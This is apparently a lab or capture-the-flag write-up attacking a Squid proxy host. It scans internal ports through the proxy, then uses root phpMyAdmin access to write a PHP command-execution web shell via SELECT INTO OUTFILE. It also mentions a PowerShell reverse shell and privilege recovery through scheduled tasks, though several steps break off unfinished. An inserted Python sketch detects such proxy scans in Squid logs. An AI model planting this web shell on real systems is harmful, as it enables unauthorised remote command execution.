Squid 🔹

Enumeration

The page served on port 3128 is the Squid proxy error page.

We can send requests through the proxy to discover ports that are open on the host behind it. For this we can use https://github.com/aancw/spose.

┌──(kali㉿kali)-[~/Desktop/spose]
└─$ python3 spose.py --proxy http://192.168.120.223:3128 --target 127.0.0.1
Using proxy address http://192.168.120.223:3128
127.0.0.1 3306 seems OPEN 
127.0.0.1 8080 seems OPEN  

Port 3306 is a MySQL service and port 8080 is a WAMP service. We can access the WAMP one in the browser through the proxy with FoxyProxy.
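Seen from the proxy side, the enumeration above leaves a clear trace: one client asking Squid for many different ports on a loopback address. The following detection sketch is an added example, not part of the original write-up; the log lines are constructed samples in Squid's native access.log format, and the client addresses, function names and the threshold of 3 ports are assumptions.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample in Squid's native access.log format (not taken from the page).
SAMPLE_LOG = """\
1700000000.101      3 192.168.45.10 TCP_MISS/503 4021 GET http://127.0.0.1:21/ - HIER_NONE/- text/html
1700000000.154      2 192.168.45.10 TCP_MISS/503 4021 GET http://127.0.0.1:22/ - HIER_NONE/- text/html
1700000000.209     11 192.168.45.10 TCP_MISS/200 312 GET http://127.0.0.1:3306/ - HIER_DIRECT/127.0.0.1 -
1700000000.260     40 192.168.45.10 TCP_MISS/200 5120 GET http://127.0.0.1:8080/ - HIER_DIRECT/127.0.0.1 text/html
1700000000.301      1 192.168.45.10 TCP_TUNNEL/503 0 CONNECT 127.0.0.1:445 - HIER_NONE/- -
1700000050.000     90 192.168.45.20 TCP_MISS/200 9000 GET http://example.com/ - HIER_DIRECT/198.51.100.7 text/html
1700000060.000     35 192.168.45.20 TCP_MISS/200 5120 GET http://127.0.0.1:8080/ - HIER_DIRECT/127.0.0.1 text/html
"""

# Fields: time elapsed client code/status bytes method URL ...
LINE = re.compile(r"^\S+\s+\d+\s+(?P<client>\S+)\s+\S+/\d{3}\s+\d+\s+\S+\s+(?P<url>\S+)")

def destination(url):
    """Return (host, port); CONNECT lines log a bare host:port instead of a URL."""
    try:
        parts = urlsplit(url if "://" in url else "//" + url)
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return None, None
    return parts.hostname, port

def is_loopback(host):
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host or "").is_loopback
    except ValueError:  # ordinary hostname or unparsable destination
        return False

def loopback_scans(log_text, min_ports=3):
    """Map client -> sorted loopback ports it requested, if it touched >= min_ports."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        host, port = destination(m["url"])
        if is_loopback(host):
            seen[m["client"]].add(port)
    return {c: sorted(p) for c, p in seen.items() if len(p) >= min_ports}

if __name__ == "__main__":
    for client, ports in loopback_scans(SAMPLE_LOG).items():
        print(f"{client} requested loopback ports via the proxy: {ports}")
```

On the proxy itself, an `http_access deny to_localhost` rule placed before the allow rules in squid.conf refuses requests whose destination is the proxy host's own loopback address.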

Initial Access

Accessing port 8080, we can see the installed apps. Try logging in to phpMyAdmin as root.

Write a PHP shell to disk with a SQL query:

SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE 'C:/wamp/www/wshell.php';

It can then be accessed in the web root.

So we can put an encoded PowerShell reverse shell and...

Privilege Escalation

We have restricted permissions. From this resource, we find out that when a LOCAL SERVICE or NETWORK SERVICE is configured to run with a restricted set of privileges, permissions can be recovered by creating a scheduled task. The new process created by the Task Scheduler Service will have all the default privileges of the associated user account.

So, first, create a task:

Post Exploitation

Get the flag.